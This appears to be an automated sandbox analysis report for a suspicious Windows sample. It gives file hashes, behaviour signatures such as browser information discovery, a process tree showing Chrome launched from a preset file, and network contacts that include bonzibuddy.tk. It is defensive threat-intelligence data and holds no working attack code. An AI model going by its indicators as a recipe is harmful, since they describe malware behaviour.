| SHA1 | 1d48c9c15ea5548af1475b5a369a4f7b8db42858 |
| SHA256 | 6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836 |
| SHA512 | 582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760 |
C:\Program Files (x86)\launch.exe
| MD5 | b4acc41d0e55b299ffeec11a8a20cf08 |
| SHA1 | bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa |
| SHA256 | 34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42 |
| SHA512 | d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794 |
C:\Program Files (x86)\date.txt
| MD5 | 255a8e245b6ad378558b90cbe3dbc3d0 |
| SHA1 | 6eb73f9f2034c113a2a6b1aab9a440a21928cfc2 |
| SHA256 | d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9 |
| SHA512 | 67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf |
C:\Program Files (x86)\msg.exe
| MD5 | 331a0667b11e02330357565427dc1175 |
| SHA1 | d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2 |
| SHA256 | fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431 |
| SHA512 | 1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec |
C:\Program Files (x86)\hello.reg
| MD5 | 81427e9d5d10657b9edffd22e7b405bb |
| SHA1 | f27ab62f77f827dbb32c66a35ac48006c47f4374 |
| SHA256 | bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83 |
| SHA512 | b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-20 18:57
Reported
2024-10-20 19:28
Platform
win10v2004-20241007-en
Max time kernel
1800s
Max time network
1732s
Command Line
Signatures
Browser Information Discovery
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133739243295733374" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\All Numby_s Impact Presets.sfpreset"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa028fcc40,0x7ffa028fcc4c,0x7ffa028fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1996,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1988 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa028fcc40,0x7ffa028fcc4c,0x7ffa028fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3752,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3764 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4656,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4508,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4448,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4496 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5252,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=860,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5448 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5496,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5592,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5580 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.201.110:443 | play.google.com | udp |
| GB | 216.58.201.110:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| GB | 172.217.169.78:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 216.58.201.99:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns-tunnel-check.googlezip.net | udp |
| US | 8.8.8.8:53 | tunnel.googlezip.net | udp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | 157.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 133.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.187.234:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c59.gcp.gvt2.com | udp |
| IT | 34.154.74.59:443 | e2c59.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.74.154.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.200.46:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 14.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 172.217.169.14:443 | google.com | udp |
| US | 8.8.8.8:53 | e2c2.gcp.gvt2.com | udp |
| HK | 34.92.53.177:443 | e2c2.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| ES | 142.250.200.99:443 | id.google.com | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 177.53.92.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | tcp |
| GB | 216.58.201.110:443 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.200.38:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 2.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.200.250.142.in-addr.arpa | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.201.110:443 | www.youtube.com | tcp |
| GB | 216.58.201.110:443 | www.youtube.com | tcp |
| GB | 216.58.201.110:443 | www.youtube.com | udp |
| GB | 216.58.201.110:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 216.58.204.78:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | bonzibuddy.tk | udp |
| US | 104.21.78.241:443 | bonzibuddy.tk | tcp |
| US | 104.21.78.241:443 | bonzibuddy.tk | tcp |
| US | 104.21.78.241:443 | bonzibuddy.tk | udp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 8.8.8.8:53 | 241.78.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.201.110:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| GB | 142.250.178.2:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c39.gcp.gvt2.com | udp |
| FI | 35.217.17.196:443 | e2c39.gcp.gvt2.com | tcp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 196.17.217.35.in-addr.arpa | udp |
| GB | 216.58.204.78:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.201.110:443 | play.google.com | udp |
Files
\??\pipe\crashpad_100_DYURAZPWEBGZYQXJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 53f896e6ec3a1c85c0d9124da3b7380e |
| SHA1 | f4b222bb0b3fda0f2ab34768d1d086bc6533575e |
| SHA256 | 17445b99fe65252ca0a67cde3f5d2b1feb0224d39f52d1641ae0bb8dd0282453 |
| SHA512 | 512cd2d07e1e7ebe78ddf8f5c5a682a30a0a9a1f55099a466ddd54c351295a92f4ac4946ebf4218d6353a3148ac38a2dbc07c9f96e12042868acce13c9edb1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | d9c37b3526145c6c03116f7a47281ae5 |
| SHA1 | e73cf11c4ee15994e485c85808d99a2361b6f252 |
| SHA256 | 02f6231eb34f91df2f50dc6ec66f504db34e49b3e33c6521ada4385063443694 |
| SHA512 | 90a9b9a6f7848a331c85b1f1b984b60759ea095b020d144c66a35ab34949543ab365065799f80492d7360e1fe91fa86bf586576af404d71e4129399527b1a2b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 0ac82099da457ed45c16561cfe80c2c8 |
| SHA1 | c15fd2aac72ce189fd7044a6736ab591cee5038d |
| SHA256 | 2b29fd3b42ca5e0e99516d2373534816a8a124f0d82e419f99d6ba1c8426006a |
| SHA512 | c5c068ff36b08916ead2dc0a8d4a7d685fa63a19d9b5c3a968bd2b164c933aa9237aafe2ea3a6fa7d25affd4b75df02f8ae326eae33eafe2a41621e2c5a0b5f9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 37a334ebbc3792979ed27ce0f16c4bae |
| SHA1 | 3cf59672abcc6d17bafe920a9eb1d0c689f914cf |
| SHA256 | 13f05b0807a63f15fa1b90d7139be618c0f960b10a4952a00447e2ae9fbbf170 |
| SHA512 | ccb1f6a81eaa08955083b3110e37533d20c012753b8fa2a0f09ade32834b73a9aa30fa08b33bf178162c42974564311cca40760ecf77bfa53b6d57f20e6c5996 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4e0baaf0532f100852daddbeeb8bc493 |
| SHA1 | e7f444311f3864affe7e3884e23b9fb89df817f9 |
| SHA256 | c89faceff38dcbfd6f6a40ffb18b0c9644cce75f9ddb0cd7d4db954a5b80f214 |
| SHA512 | b50c1bc55855de1c79f48b27a15f988ca4f77d9843c6a1a3b4cd0da20b541b22980453d50d9b9b75ebeebaf6688913bcc2b0707d5ab1c86fb108e14c0d70de59 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 0b5d266ca5d54fc597984dad300e1e7e |
| SHA1 | 9b4107885a291562d7b54f8edb3d8e3c56ff6c34 |
| SHA256 | 17119e80ff8c99452a1daf753a34dfcaf64f8abc6163c03d30dd874f9a2dfbca |
| SHA512 | 93feb223cb212bd5ee84e7d8bb75a7c4e7ecf84080e47dcc2f6554d92d5d2b904086e1ede2de85245235295e872cae815286ff8c895748a40bc2de23785b8d95 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fadbe24c81b62317f8444a955a6a3dfa |
| SHA1 | 032bcfd0a38028f0dac32b3ed07b3e0cd7a43fee |
| SHA256 | ff02b58d6d329bbfcb168bd0db91b4a0db181deb443190cf23c9d1d8395e612e |
| SHA512 | e9005c350b17573a3fbebe5907b3c65cb077b7d90108201f8924fbb47276d004f47c91daa4e728ec05334745d863ad4ca386a55d77cd780e9cae0673bbc07ac1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bbe97e0d2ede1c6e3e8e41566523d2e6 |
| SHA1 | ae732a8ddf3647fb834b8486e7a4c4af325aa02c |
| SHA256 | afcbd322aa71524c50a707f9bf37f6c7a0b09c25f97dfda29d6da741e744c72d |
| SHA512 | 7931382c9f4d448c3ddffe9a58e53b59fb90e9e2011f58fe19c5e5d6a18345fddbb6ba222db56218ee64b4769821866db4be5cc2f3c51496c7edceb713a97df1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 04fa51b7e72f05505ac9048612bb30e6 |
| SHA1 | 9fa94052191a6be40290d5e7a927a2885f093e54 |
| SHA256 | 94a3fe401210bddbceca2356cf80d18e9bacead0ff2c38c121d9bbbabf176d8d |
